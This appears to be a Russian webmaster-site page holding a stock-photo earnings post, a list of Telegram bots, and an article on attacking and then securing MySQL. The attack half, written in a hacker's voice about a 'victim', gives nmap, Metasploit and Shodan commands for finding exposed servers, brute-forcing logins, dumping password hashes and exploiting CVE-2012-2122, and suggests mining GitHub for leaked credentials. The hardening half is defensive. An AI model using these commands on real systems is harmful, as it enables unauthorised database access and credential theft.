F-117@losena.ru

МЕНЮ

НАШИ ПРОЕКТЫ

АРХИВ

Январь 2021 (10)
Декабрь 2020 (18)
Ноябрь 2020 (45)
Октябрь 2020 (18)
Сентябрь 2020 (15)
Август 2020 (17)

ОПРОСЫ

Какой системой для переводов денег вы пользуетесь?

Проект LosenaGroupTeam » Вебмастеру

Заработок на фотографиях.


Заработок на фотографиях
Если раньше фотография была уделом избранных, то сегодня стать фотографом может каждый. Благо, камеры в современных смартфонах на голову превосходят возможности многих «мыльниц».
Мы фотографируем везде: на работе, на отдыхе, по дороге домой. Порой удается заснять множество прекрасных моментов. Они впустую занимают место в вашем компьютере.
Качество цифровых фотографий великолепно. Но даже если снимок получился средненьким, это легко исправить. Фоторедакторы, наподобие Фотошоп, позволяют сделать ярким и насыщенным даже самый посредственный снимок.
Сегодня грань между профессиональной и любительской фотографией сведена к минимуму. Зарабатывать могут не только профессионалы, но и все желающие. Причем, сегодня, после появления цифрового фото, продать снимки можно не только в ближайшей редакции. Найти покупателя можно в любой стране мира.
Речь идет о заработках на фотостоках. Фотосток – это громадный архив цифровых фотографий. Практически любой фотограф здесь может разместить свои снимки. Это виртуальная биржа цифрового фото. Если одни могут здесь продавать фотографии, то другие покупать.
Правила регистрации на различных стоках могут отличаться. Если на одних зарегистрироваться может практически любой, на других условия более жесткие. От вас потребуют выслать лучшие снимки.
Если модерацию удалось пройти, вы сможете продавать свои фото. Реализация фотографий имеет свои особенности. Чтобы потенциальный покупатель увидел ваши снимки, им необходимо присвоить ключевые слова, по которым может вестись поиск. Для того чтобы расширить географию покупателей, рекомендуем присваивать снимкам англоязычные теги. Разместив фотографии, вам остается ждать пока их купят. Никаких дополнительных действий делать не придется.
Преимущества работы с фотостоками
Вы выходите на международный рынок. Фотографии смогут купить клиенты из любой точки мира.
Хоть снимки стоят и не очень дорого, но их можно продавать неограниченное количество раз. Фактически, разместив фото, вы получаете неограниченный источник дохода. Чем больше качественных фотографий вы загрузите, тем больше денег сможете получить в будущем.
Работа со стоками мотивирует фотографа, заставляет его расти, развиваться. Одно дело, когда снимаешь для себя, а другое, когда зарабатываешь на этом деньги. При этом вы будете заниматься любимым делом.
Вы будете продавать фотографии, при этом не придется создавать площадку в интернете, заниматься ее раскруткой. Все это сделают за вас.
Недостатки фотостоков
Но не стоит себя тешить радужными надеждами. Заработок на фотостоках имеет свои особенности. Попасть на ТОПовые фотостоки не так уж и просто. Вы должны предложить действительно классные снимки. Модерация фотографий может занять до месяца, так что первые деньги появятся не скоро.
Фотографии должны быть интересны для покупателей. Это значит, что у них должна быть коммерческая ценность. Фотограф должен разбираться в особенностях рынка. Рекомендации по выбору снимков можно найти на сайтах самих площадок.
Фотографий много, стоят они недорого. Чтобы получать доход с фотостоков, придется заняться этим делом основательно. Один-два снимка существенной прибыли не принесут.
Секреты заработка на фотостоках
Есть несколько простых рекомендаций, которые помогут достигнуть фотографу финансового успеха. Самый главный секрет – это регулярность. Вы должны для себя решить, сколько снимков вы будете выкладывать каждый день. Придерживайтесь графика.
Начав работу, вы поймете, какие снимки пользуются наибольшим спросом. Именно на самой удачной тематике и стоит сконцентрироваться.
Отсутствие продаж в начале карьеры не должно вызывать у вас досады. На вас работает накопительный эффект. Продажи пойдут, когда будет выложено определенное количество фотографий.
Расширьте ассортимент. Выкладывайте видео, графику, иллюстрации и пр.
Начните работу уже сегодня. Мы специально выбрали для вас 5 наиболее популярных фотостоков
Шаттерсток https://submit.shutterstock.com/
Дримсайт https://www.dreamstime.com/
Депозитфото https://www.dreamstime.com/
Фотолиа https://ru.fotolia.com/
Понд5 https://www.pond5.com/ru/
Пробуйте, и у вас все получится.
Подробнее

Методы взлома и защиты баз данных MySQL


Методы взлома и защиты баз данных MySQL

Базы данных (БД) — это наиболее значимый и ценный актив для любой компании. Поскольку в БД может храниться очень деликатная или конфиденциальная информация, необходимо очень серьезно относиться к ее защите. Любые сбои в работе СУБД и баз данных могут привести к катастрофическим последствиям.

MySQL является одной из наиболее популярных баз данных в Internet, и часто используется вместе с PHP. Помимо её бесспорных преимуществ, таких как простота использования и относительно высокая эффективность, MySQL предлагает простые, но в то же время очень эффективные механизмы защиты. К сожалению, заданная по умолчанию инсталляция MySQL, а в особенности пустой пароль по умолчанию и потенциальная уязвимость к атакам переполнения буфера, делают базу данных MySQL простым объектом для нападений.

Как работают базы данных MySQL?

Когда пользователь пытается открыть страницу сайта (page.php), то перед тем как он увидит сайт, на сервере хостинг-провайдера произойдет следующее:

  • Выполнится PHP-код из файла page.php
  • Из базы данных (database.sql) будет считан весь текстовый контент страницы
  • Из файла стилей (style.css) будут считаны стили (что, где и на каком месте находится, шрифты, размеры и т.д.)
  • Пользователю будет показана страница которую он хотел увидеть.

Также нужно понимать, что пользователь может оставлять комментарии на странице, добавлять посты (статьи) и многое другое. В это время, все изменения сохраняются в базу данных, и когда страница будет запрошена в следующий раз – она будет уже обновленной (т.к. из базы данных считывается обновленная информация).

Взламываем базу данных MySql

Допустим, что мы уже знаем, кто наша жертва взлома базы данных, знаем его IP либо находимся в его локальной сети. Нам нужно просканировать его адрес (сеть) на наличие открытых портов. По стандарту MySQL использует порт 3306, его мы и будем искать. В арсенале каждого хакера должен присутствовать сканер Nmap, который позволяет находить различные сервисы, порты на целевых машинах.

MySQL — это реляционная система управления базами данных, которая обладает разными движками хранения данных: MyISAM, InnoDB, Archive и другими. Как и у большинства open source проектов, у нее существуют свои ответвления, например MariaDB.

SQL Injection – метод, предназначенный для введения SQL запросов/команд через web-страницы. Многие web-страницы используют параметры, представленные Web пользователям, и делают SQL запрос базы данных. Возьмем для примера случай с логином пользователя, когда имеется web-страница c именем и паролем и производится SQL запрос в базе данных, для осуществления проверки, имеется ли зарегистрированный пользователь с таким именем и паролем. С использованием SQL Injection можно послать придуманное имя пользователя и/или поле пароля, изменяющее SQL запрос, что может предоставить нам кое-что интересное.

Пример команды для сканирования выглядит следующим образом:

nmap -sV -PN  -p <port> <ip>
  • -PN — очень полезная вещь, указывающая программе пропускать этап обнаружения хоста и сразу переходить к сканированию портов. Это нужно в том случае, если машина не отвечает на ping-сканирование, но при этом у машины могут быть открыты порты. В таком случае без данного флага Nmap пропустит данный хост;
  • -sV исследует открытые порты с целью получения информации о службе.

Для UDP-сканирования должен присутствовать флаг -sU.

nmap -sV -Pn -p 3306 172.16.2.114
Nmap scan report for 172.16.2.114
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL (unauthorized)

SHODAN

Если у тебя нет определенной жертвы и ты хочешь протестировать свои навыки, то можешь воспользоваться хакерским поисковиком Shodan. Он позволяет делать поиск по хостам и выводить информацию о различных сервисах на основе баннеров ответов. Также имеет возможность фильтровать по портам, стране, городу, операционным системам и так далее. Одна из отличнейших фишек — поиск сервисов с анонимной авторизацией или авторизацией со стандартными кредами. Очень полезный сервис, но лучше всего проводить тесты уязвимостей на своих локальных ресурсах :).

GitHub

Одна из крутейших фишек легкого доступа к базам данных — поиск исходников каких-либо проектов на GitHub. Прежде чем искать и раскручивать SQL Inj на сайте, что может занять достаточно длительное время (если таковые вообще присутствуют), достаточно просто зайти на всеми любимый сайт для совместной разработки, вписать пару слов и при должном везении получить доступ к сорцам. Многие разработчики в силу непонятных причин заливают свои проекты в общий доступ — может, по глупости, может, им жалко денег на приватный репозиторий, а может, они хотят поделиться со всем миром своим великолепным кодом, но на GitHub лежит огромная куча исходников, от маленьких сайтиков до больших проектов. Это зачастую сильно упрощает работу. Допустим, если мы введем такой поисковый запрос username mysql password database, то можно просто потерять сознание от количества результатов. Особенно много сладких PHP-файлов, в которых прописывается коннект к базе данных.

Поэтому первым делом на пентестах мы бежим и проверяем GitHub на наличие исходников клиента. Если что-то находится, то можно смело коннектиться к базе данных, после чего, отталкиваясь от прав, извлекать нужные нам данные. Но если уж получилось так, что мы не смогли найти заветных строчек username/password, не стоит отчаиваться — можно порыться в исходниках сайтов, если они присутствуют, и проводить аудит уже не вслепую, а с исходным кодом сервиса. Он значительно облегчает задачу поиска уязвимостей: теперь мы будем не просто фазить наобум, а проверять определенные векторы, выстроенные на основе исходников. Например, смотреть, в каких местах производится обращение в базу, используется ли фильтрация данных от клиента и так далее.

Инструменты

Для поиска инъекций существуют разные способы: автоматически или вручную вставлять везде кавычку (фаззинг); использовать фишку с Гитхабом, уповая на неосторожность разработчиков исследуемого сервиса. И наконец настал момент истины: мы нашли нашу долгожданную инъекцию и готовы внедряться по полной. Но вот беда, у нас появились неотложные дела (друзья зовут попить пива), или нас одолела ужасная необоримая лень.

Не стоит расстраиваться, на помощь придет отличная тулза sqlmap, которая автоматизирует процесс поиска и эксплуатации SQL-инъекций, и не просто найдет дыру в безопасности, а проэксплуатирует ее по полной программе. Поддерживает все виды инъекций. Функционал sqlmap позволяет: дампить базы, автоматически искать в базе, извлекать и расшифровывать логины и пароли, запускать cmd shell, запускать интерактивный sql shell, в котором тебе нужно только писать SQL-запросы в базу, а sqlmap сам составит payload для инъекции. Существует отличный Cheet Sheet, который в двух страничках показывает все возможности данной тулзы.

Есть еще несколько инструментов, которые пригодятся тебе в нелегком деле покорения MySQL. В особенном представлении они не нуждаются, так как наверняка ты о них уже не раз (не одну тысячу раз) слышал. Первый — Metasploit, одна из ключевых программ для хакинга, позволяющая создавать эксплойты, проводить их отладку. Второй — сканер Nmap, про который в журнале тоже не раз писали.

Информации по всем перечисленным инструментам хватает с избытком, поэтому мы не будем углубляться в детали их использования, кто их еще не юзал — обязательно должен это сделать, а Google и официальные сайты ему в этом помогут. Мы же двигаемся дальше.

Сбор инфы

Нужно начать с самого простого — сбора информации. В Metasploit для этого служит auxiliary/scanner/mysql/mysql_version, просто сканер версий, который может сканировать целый пул адресов:

msf > use auxiliary/scanner/mysql/mysql_version
msf auxilary(mysql_version) > set RHOSTS 172.16.2.54
msf auxilary(mysql_version) > exploit

В Nmap также существует модуль, который подключается к серверу и выводит разную полезную информацию: протокол, номер версии, состояние и соль.

nmap -sV -sC <target>

Брутфорс

Среди основных вещей, которые приходится часто выполнять, конечно, брутфорс — проверка на слабые или стандартные пароли пользователей. Но прежде чем приступать к подбору паролей, можно провести атаку user enumeration (перечисление пользователей). Ее можно провести против серверов версии 5.x, которые поддерживают старые механизмы аутентификации (CVE-2012-5615). После сканирования мы будем знать, какие пользователи существуют в базе, что значительно сокращает пул пользователей для бруторса.

nmap --script mysql-enum <target>

Составив наш пул имен и паролей, приступаем к бруту:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set USER_FILE /root/login/logins
msf auxiliary(mysql_login) > set PASS_FILE /root/login/password
msf auxiliary(mysql_login) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_login) > exploit

Nmap использует стандартные списки паролей и пользователей, но всегда можно взять свои:

nmap --script mysql-brute <target>
--script-args userdb=<path> - подключаем свой список логинов
--script-args passdb=<path> - подключаем свой список паролей

Кстати говоря, вот тебе отличный репозиторий, где можно найти самые популярные логины, пароли и не только. Ну и обычно при брутфорсе выполняется еще одна простая, но довольно важная проверка на пустой пароль для пользователя root или anonymous:

nmap -sV --script=mysql-empty-password <target>

Эксплуатация

Следующий важный шаг, который наступает после получения логина/пароля (через инъекцию или полным перебором), — это постэксплуатация. Я перечислю различные модули для Nmap’а и их предназначение. Итак, модуль, который производит вывод баз данных:

nmap -sV --script mysql-databases <target>

Модуль, который производит вывод пользователей:

nmap -sV --script mysql-users <target>

Модуль, который производит вывод переменных:

nmap -sV --script mysql-variables <target>

Модуль, который производит вывод пользователей и их хешей в виде, удобном для брутфорса:

nmap -p 3306 <ip> --script mysql-dump-hashes –script args='username=root,password=secret'
msf>use auxiliary/admin/mysql/mysql_hashdump

Модуль, который заменяет клиент MySQL и отправляет запросы в удаленную базу:

nmap -p 3306 <ip> --script mysql-query --script-\ args='query="<query>"[,username=<username>,password=<password>]'
msf>use auxiliary/admin/mysql/mysql_sql

Сканирование

Отдельно стоит упомянуть про один интересный модуль, который присутствует как в Metasploit, так и в Nmap, — модуль проверки на CVE-2012-2122. Данная уязвимость позволяет удаленным пользователям обходить аутентификацию из-за ненадлежащей проверки возвращаемых значений. Существует возможность авторизации с неправильным паролем с вероятностью 1/256, так как MySQL считает, что пришедший токен от пользователя и ожидаемое значение равны. Используя известное имя пользователя (например, root, который присутствует практически всегда) с любым паролем, можно подключиться к базе, повторяя подключение порядка 300 раз. После чего можно сдампить все пароли пользователей, сбрутфорсить их и коннектиться уже с легитимным паролем. Но не все так хорошо, как кажется, — данной уязвимости подвержены только сборки, где функция memcmp() возвращает значения за пределами диапазона от –128 до 127, то есть это достаточно ограниченное число систем:

  • Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04);
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log;
  • Debian Unstable 64-bit 5.5.23-2;
  • Fedora;
  • Arch Linux.

Но если есть даже самая незначительная возможность попасть в базу, то стоит попробовать:

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 172.16.2.54
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > exploit

Для Nmap при сканировании нужно использовать скрипт mysql-vuln-cve2012-2122:

nmap -sV --script mysql-vuln-cve2012-2122 <target>

Защищаем базу данных MySql

Далее будут описаны основные шаги, выполнение которых, максимально защитит базу данных MySQL от локальных и удаленных нападений. Это третья и последняя статья из цикла статей, посвященных защите Apache, PHP и MySQL.

РhpMyAdmin — это программа написанная на PHP и предназначенная для управления сервером MySQL через всемирную сеть. phpMyAdmin поддерживает широкий набор операций над MySQL. Наиболее часто используемые операции поддерживаются с помощью пользовательского интерфейса (управление базами данных, таблицами, полями, связями, индексами, пользователями, правами, и т. д.), одновременно вы можете напрямую выполнить любой SQL запрос.

Обеспечение информационной безопасности разрабатываемого проекта осуществляется на нескольких уровнях. На первом уровне защиту информации обеспечивает сама система «phpMyAdmin» начиная со входа в панель управления где панель требуется ввести логин и пароль. Следующий уровень защиты обеспечивает СУБД MySQL, разграничивая также права доступа.

Кроме того, также можно ограничить доступ не только к самой системе управления базами данных, но и отдельно к базам данных, к таблицам базы данных, к записям конкретных таблиц и даже к значениям полей таблиц или записей. Стоит отметить, что встроенные функции шифрования присутствуют далеко не во всех СУБД. Следовательно, универсальным данный метод назвать нельзя. Данная СУБД предлагает два однотипных набора функций шифрования, в одном из которых реализован алгоритм DES, а в другом — AES. Кроме того, в MySQL реализовано несколько алгоритмов хэширования.

Набор криптографических функций данной СУБД выглядит так:

Функции шифрования данных алгоритмом AES используют 128-битный ключ шифрования, т. е. шифрование ключами размером 192 и 256 бит, предусмотренными стандартом AES , в MySQL не реализовано. Ключ шифрования задается явным образом как один из параметров функции. В отличие от них, функции DES_ENCRYPT() и DES_DECRYPT(), которые шифруют алгоритмом TripleDES, помимо явного задания ключа шифрования, допускают простейший вариант управления ключами в виде ключевого файла, содержащего пронумерованные значения ключей. Однако, данные функции по умолчанию выключены, для их использования необходимо включить поддержку протокола SSL в конфигурации СУБД.

Функция ENCRYPT() может быть использована только в операционных системах семейства Unix, поскольку она шифрует данные с помощью системного вызова crypt(). Что касается используемых функций хэширования, то в документации на MySQL содержится предупреждение о том, что лежащие в их основе алгоритмы взломаны (подробно об этом написано, в частности, в, поэтому использовать их следует с осторожностью. Однако, MySQL пока не предлагает более стойких функций хэширования взамен существующих. Перечисленные выше криптографические функции также весьма просты в использовании.

Необходимые условия для защиты

Чтобы достигнуть самого высокого возможного уровня защиты, установка и конфигурация mysql должна быть выполнена в соответствии со следующими требованиями:

база данных mysql должна быть выполнена в chrooted среде;процессы mysql должны выполняться под уникальным UID/GID, неиспользуемым никаким другим системным процессом;Должен быть разрешен только локальный доступ к mysql;Основная учетная запись mysql должна быть защищена “сложным” паролем;Будет переименована учетная запись администратора;Должен быть заблокирован анонимный доступ к базе данных (используя учетную запись nobody);Должны быть удалены все типовые базы данных и таблицы.

Установка MySQL

Прежде чем начать осуществление защиты MySQL, мы должны установить программное обеспечение на сервере. Как мы писали в предыдущих статьях, мы запустим инсталляцию, создав уникальную, постоянную группу и учетную запись пользователя на операционной системе, которая будет посвящена базе данных MySQL:

pw groupadd mysql

pw useradd mysql-c ” mysql Сервер “-d/dev/null-g mysql-s/sbin/nologin

Компиляция mysql

Мы скомпилируем и установим mysql в каталог /usr/local/mysql:

./configure –prefix=/usr/local/mysql –with-mysqld-user=mysql –with-unix-socket-path=/tmp/mysql.sock –with-mysqld-ldflags=-all-static

make

su

make install

strip /usr/local/mysql/libexec/mysqld

scripts/mysql_install_db

chown -R root /usr/local/mysql

chown -R mysql /usr/local/mysql/var

chgrp -R mysql /usr/local/mysql

Приведенный процесс установки сервера практически идентичен описанному в руководстве к mysql. Единственным отличием является использование нескольких дополнительных параметров, указанных в строке: ./configure. Наиболее важным отличием является использование параметра – with–mysqld–ldflags =-all-static, который делает MySQL сервер статически связанным. Это значительно упрощает процесс chrooting сервера, как описано в Разделе 3. Остальные параметры приказывают makeпрограмме установить программное обеспечение в каталог /usr/local/mysql, выполнить MySQL демон с привилегиями учетной записи mysql, и создать сокет mysql.sock в каталоге /tmp.

Копирование файлов конфигурации

После выполнения вышеупомянутых команд, мы должны скопировать заданный по умолчанию файл конфигурации в соответствии с ожидаемым размером базы данных (маленькая, средняя, большая, огромная). Например:

cp support-files/my-medium.cnf /etc/my.cnf

chown root:sys /etc/my.cnf

chmod 644 /etc/my.cnf

Запуск сервера mysq

Теперь mysql полностью установлен и готов к выполнению. Мы можем запустить mysql сервер, выполнив следующую команду:

/usr/local/mysql/bin/mysqld_safe

Проверка подключений

Попробуйте установить связь с базой данных следующим образом:

/usr/local/mysql/bin/mysql -u root mysql

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 2 to server version: 4.0.13-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;

+----------+

| Database |

+----------+

| mysql |

| test |

+----------+

2 rows in set (0.00 sec)

mysql> quit;

Как только подключение успешно установлено, мы можем остановить работу базы данных:

/usr/local/mysql/bin/mysqladmin -u root shutdown

и начать защиту программного обеспечения. Иначе, мы должны будем проанализировать информацию, сохраненную в файле регистрации /usr/local/mysql/var/`hostname`.err, и устранить причину проблемы.

Chrooting сервер

Первый шаг защиты mysql должен подготовить chrooted среду, в которой будет выполняться mysql сервер. Chrooting методика была подробно описана в первой статье этого цикла (“Защита Apache: Шаг за шагом, поэтому если Вы не знакомы с этой методикой или не знаете почему рекомендуется chrooting, пожалуйста прочтите эту статью.

Операционная система

Как и в предыдущих статьях, мы будем основываться на операционной системе FreeBSD 4.7. Однако представленные методы должны также применяться и на более современных unix и unix-подобных системах.

Подготовка chroot среды

Чтобы подготовить chrooted среду, мы должны создать следующую структуру каталога:

mkdir -p /chroot/mysql/dev

mkdir -p /chroot/mysql/etc

mkdir -p /chroot/mysql/tmp

mkdir -p /chroot/mysql/var/tmp

mkdir -p /chroot/mysql/usr/local/mysql/libexec

mkdir -p /chroot/mysql/usr/local/mysql/share/mysql/english

Установка прав доступа

Права доступа к вышеупомянутым каталогам должны быть установлены следующим образом:

chown -R root:sys /chroot/mysql

chmod -R 755 /chroot/mysql

chmod 1777 /chroot/mysql/tmp

Создание структуры каталогов

Затем, необходимо скопировать следующие файлы в новую структуру каталога:

cp/usr/local/mysql/libexec/mysqld/chroot/mysql/usr/local/mysql/libexec/

cp/usr/local/mysql/share/mysql/english/er rmsg.sys/chroot/mysql/usr/local/mysql/share/mys ql/english/

cp/etc/hosts/chroot/mysql/etc/

cp/etc/host.conf/chroot/mysql/etc/

cp/etc/resolv.conf/chroot/mysql/etc/

cp/etc/group/chroot/mysql/etc/

cp/etc/master.passwd/chroot/mysql/etc/passwords

cp/etc/my.cnf/chroot/mysql/etc/

Сжатие паролей и групп

Из файлов: /chroot/mysql/etc/passwords и /chroot/mysql/etc/group мы должны удалить все строки кроме учетной записи mysql и группы. Затем, мы должны, создать базу данных паролей (допустимо только в FreeBSD):

cd /chroot/mysql/etc

pwd_mkdb -d /chroot/mysql/etc passwords

rm -rf /chroot/mysql/etc/master.passwd

Специальные соображения

Как и в случае с Web-сервером Apache, мы должны создать специальный файл устройства /dev/null:

ls -al /dev/null

crw-rw-rw- 1 root sys 2, 2 Jun 21 18:31 /dev/null

mknod /chroot/mysql/dev/null c 2 2

chown root:sys /chroot/mysql/dev/null

chmod 666 /chroot/mysql/dev/null

Теперь необходимо скопировать базу данных mysql, которая содержит таблицы, созданные в процессе инсталляции mysql:

cp-R/usr/local/mysql/var//chroot/mysql/usr/local/mysql/var

chown-R mysql:mysql/chroot/mysql/usr/local/mysql/var

Локализация

Если будет использоваться какой-либо язык кроме английского, то необходимо будет скопировать нужный набор символов из каталога /usr/local/mysql/share/mysql/charsets.

Проверка конфигурации

Теперь MySQL готов к запуску в chrooted среде. Мы можем проверить, правильно ли запускается MySql, выполнив следующую команду:

chrootuid /chroot/mysql mysql /usr/local/mysql/libexec/mysqld &

Если произойдет какая-либо ошибка, то необходимо будет использовать команду truss или подобную ей, типа ktrace/kdump, strace, и т.д. Это поможет нам определить и устранить причину проблемы.

Заметьте, что для выполнения процесса mysqld, вместо chroot, как в случае Apache или PHP, использовалась программа chrootuid. Главное отличие состоит в том, что chrootuid меняет владельца запущенного процесса. В нашем примере, mysqld выполняется в chrooted среде, но владелец процесса – не root, а пользователь mysql. Chrootuid во многих операционных системах не установлен по умолчанию, поэтому необходимо загрузить и установить эту программу вручную. Программа Chrootuidможет быть загружена здесь .

Конфигурирование сервера

Следующий шаг должен сконфигурировать сервер базы данных в соответствии с нашими требованиями по защите.

В случае заданной по умолчанию инсталляции mysql, главным файлом конфигурации является /etc/my.cnf. Однако, в нашем случае, из-за выполнения сервера в chrooted среде, мы будем использовать два файла конфигурации: /chroot/mysql/etc/my.cnf и /etc/my.cnf. Первый будет использоваться сервером mysql, а второй – утилитами mysql (например: mysqladmin, mysql, mysqldump и т.д.). В обоих случаях, потребуются некоторые изменения конфигурации.

Отключение удаленного доступа

Первое изменение касается порта 3306/tcp, который mysql прослушивает по умолчанию. Поскольку, согласно начальным предположениям по защите, база данных будет использоваться только локально установленными PHP приложениями, мы можем свободно отключить прослушивание этого порта. Это ограничит возможность нападения на базу данных mysql прямыми TCP/IP подключениями с других хостов. Чтобы отключить прослушивание упомянутого порта, необходимо к разделу [mysqld] файла /chroot/mysql/etc/my.cnf добавить следующий параметр:

skip-networking

Если, по некоторым причинам, все же требуется удаленный доступ к базе данных (например, чтобы выполнить удаленное резервирование данных), то можно использовать SSH протокол, как показано ниже:

backuphost$ ssh mysqlserver /usr/local/mysql/bin/mysqldump -A > backup

Улучшение локальной защиты

Следующее изменение должно отключить использование команды LOAD DATA LOCAL INFILE, что поможет предотвратить несанкционированное чтение данных из локальных файлов. Это имеет особенное значение, в случае если в PHP будет найдена новая уязвимость к SQL инъекциям.

Для этой цели, в раздел [mysqld] файла /chroot/mysql/etc/my.cnf, необходимо добавить следующий параметр:

Set-variable=local-infile=0

Кроме того, чтобы сделать более удобным использование административных средств базы данных, в разделе [Client] файла /etc/my.cnf, должен быть изменен следующий параметр:

socket = /chroot/mysql/tmp/mysql.sock

Благодаря этому, каждый раз при выполнении этих утилит, не будет никакой потребности передавать в команды: mysql, mysqladmin, mysqldump и т.д., параметрsocket =/chroot/mysql/tmp/mysql.sock.

Изменение пароля администратора

Одним из наиболее важных шагов в защите MySQL, является изменение пароля администратора базы данных, который является по умолчанию пустым. Чтобы сделать это, мы должны запустить MySQL (если конечно, он уже не запущен):

chrootuid /chroot/mysql mysql /usr/local/mysql/libexec/mysqld &

и изменить пароль администратора следующим образом:

/usr/local/mysql/bin/mysql -u root

mysql> SET PASSWORD FOR [email protected]=PASSWORD(‘new_password’);

Хорошей привычкой является отказ от изменений паролей из командной строки, например, используя команду “mysqladminpassword“. Это особенно важно, если на сервере работают несколько пользователей. В таком случае пароль можно легко узнать, например, используя команду “ps aux” или просмотрев файлы истории команд (~/.history, ~/.bash_history и т.д), в случае если на них установлены неподходящие права доступа.

Удаление значений по умолчанию users/db

Затем, мы должны удалить типовую базу данных (test) и все учетные записи, кроме главной локальной учетной записи:

mysql> drop database test;

mysql> use mysql;

mysql> delete from db;

mysql> delete from user where not (host=”localhost” and user=”root”);

mysql> flush privileges;

Это предотвратит нашу базу данных от установления анонимных подключений, а также, независимо от параметра skip-networking в файле /chroot/mysql/etc/my.cnf –, удаленных подключений.

Изменение имени учетной записи администратора

Также рекомендуется изменить заданное по умолчанию имя учетной записи администратора (root), на любое более сложное значение. Такая замена затруднит выполнение “лобовых” и “словарных” атак на пароль администратора. В этом случае, вторгшийся должен будет предположить не только пароль, но и, прежде всего, имя учетной записи администратора.

mysql> update user set user=”mydbadmin” where user=”root”;

mysql> flush privileges;

Удаление файлов истории команд

Наконец, мы должны удалить содержимое файла истории команд mysql (~/.mysql_history), в котором сохраняются все выполненные SQL команды (особенно пароли, сохраненные как открытый текст):

Связь между PHP и mysql

В предыдущей статье “Защищаем PHP: Шаг за шагом“, автор упомянул о проблеме связи между PHP и mysql, в случае, если одна из этих программ выполняется в chrooted среде. Поскольку локально PHP связывается с mysql, используя сокет /tmp/mysql.sock, размещение PHP в chrooted среде, означает, что они не могут связываться друг с другом. Для решения этой проблемы, каждый раз, запуская mysql, мы должны создавать постоянную связь с PHP chrooted средой:

ln /chroot/mysql/tmp/mysql.sock /chroot/httpd/tmp/

Обратите внимание на то, что сокет /chroot/mysql/tmp/mysql.sock и каталог /chroot/httpd/tmp должны быть физически помещены в том же самой файловой системе. Иначе программы не смогут связываться друг с другом, т.к. постоянные связи не работают между различными файловыми системами.

Финальные шаги

Теперь мы уже можем создавать все базы данных и учетные записи, которые будут использоваться определенными PHP приложениями. Необходимо подчеркнуть, что эти учетные записи должны иметь права доступа только к базам данных, используемым PHP приложениями. В частности они не должны иметь никаких прав доступа к базе данных mysql, и ни никаким системным или административным привилегиям (FILE, GRANT, ALTER, SHOW DATABASE, RELOAD, SHUTDOWN, PROCESS, SUPER и т.д.).

Наконец, необходимо создать основной сценарий, который будет использоваться для запуска mysql во время загрузки операционной системы. Пример такого сценария показан ниже,:

#!/bin/sh
CHROOT_MYSQL=/chroot/mysql
CHROOT_PHP=/chroot/httpd
SOCKET=/tmp/mysql.sock
MYSQLD=/usr/local/mysql/libexec/mysqld
PIDFILE=/usr/local/mysql/var/`hostname`.pid
CHROOTUID=/usr/local/sbin/chrootuid
echo -n " mysql"
case "$1" in
start)
rm -rf ${CHROOT_PHP}/${SOCKET}
nohup ${CHROOTUID} ${CHROOT_MYSQL} mysql ${MYSQLD} >/dev/null 2>&1 &
sleep 5 && ln ${CHROOT_MYSQL}/${SOCKET} ${CHROOT_PHP}/${SOCKET}
;;
stop)
kill `cat ${CHROOT_MYSQL}/${PIDFILE}`
rm -rf ${CHROOT_MYSQL}/${SOCKET}
;;
*)
echo ""
echo "Usage: `basename $0` {start|stop}" >&2
exit 64
;;
esac
exit 0

В случае с нашей системой FreeBSD, вышеупомянутый сценарий должен быть помещен в каталог /usr/local/etc/rc.d, под именем mysql.sh.


Подробнее

Полезные боты


финансовые и криптовалютные боты:

https://t.me/ProfitRobot - заработок на офферах, веб-серфинге, партнерской программе.
https://t.me/Moneytellbot - раскрутка телеграм-каналов. Можно зарабатывать на выполнении заданий.
https://t.me/BTC_CHANGE_BOT - продажа и покупка Bitcoin, бесплатные кошельки, заработок на комиссиях.
https://t.me/DASH_CHANGE_BOT - быстрый и бесплатный кошелек, а также сервис моментально обмена криптовалюты DASH (DASH), заработок на комиссиях.
https://t.me/LTC_CHANGE_BOT - быстрый и бесплатный кошелек, а также сервис моментально обмена LTC (Litecoin), заработок на комиссиях.
https://t.me/DOGE_CHANGE_BOT - быстрый и бесплатный кошелек, а также сервис моментально обмена DOGE (Dogecoin), заработок на комиссиях.
http://telegram.me/ETH_CHANGE_BOT - быстрый и бесплатный кошелек, а также сервис моментального обмена Ethereum, заработок на комиссиях.

официальные боты (со звездочкой):

https://t.me/BotFather - отец всех ботов, главный и официальный бот Телеграм, создает ваших собственных ботов.
https://t.me/telegraph - бот для залогинивания в Telegra.ph (Телеграф), и просмотра всех своих статей.
https://t.me/SpamBot - официальный бот, сообщает когда исчезнет блокировка вашего аккаунта из-за спама.
https://t.me/IFTTT - бот известного сервиса для интеграции телеграм с другими сайтами и службами.
https://t.me/gamee - бот для игр в телеграм.

боты в помощь администратору канала:

https://t.me/vote - бот для создания анонимных опросов.
https://t.me/groupagreebot - бот для создания персонализированных опросов, проголосовавших видят все.
https://t.me/ControllerBot - бот-комбайн, для форматирования постов, публикации по таймингу, просмотра статистики и др.
https://t.me/markdownrobot - бот для публикаций в формате маркдаун.
https://t.me/chatkeeperbot - бот помогает в управлении группой с правилами, анти-флуд, описанием, пользовательскими триггерами, и многое другое.
https://t.me/UtmGeneratorBot - бот для генерации UTM меток в пару кликов.
https://t.me/combot - бот для администрирования чатов, сбора статистики и её визуализации.
https://t.me/LivegramBot - бот для создания своих ботов обратной связи.
https://telegram.me/chotamreaderbot - Автоматически переносит в Telegraph содержимое любой статьи — копирует заголовки, базовое форматирование, изображения и видео. Всё это пользователи Телеграм могут смотреть в режиме InstantView.
https://t.me/vk_bot - интеграция с ВКонтакте, для админов групп VK.
https://t.me/banofbot - бот, организующий голосование за бан пользователя в отсутствие админов групп.
https://t.me/crssbot - бот создает RSS для вашего Telegram канала.
https://t.me/SecretgramBot - создание анонимных комментов к посту.
https://t.me/ShortUrlRUBot - сокращатель ссылок.
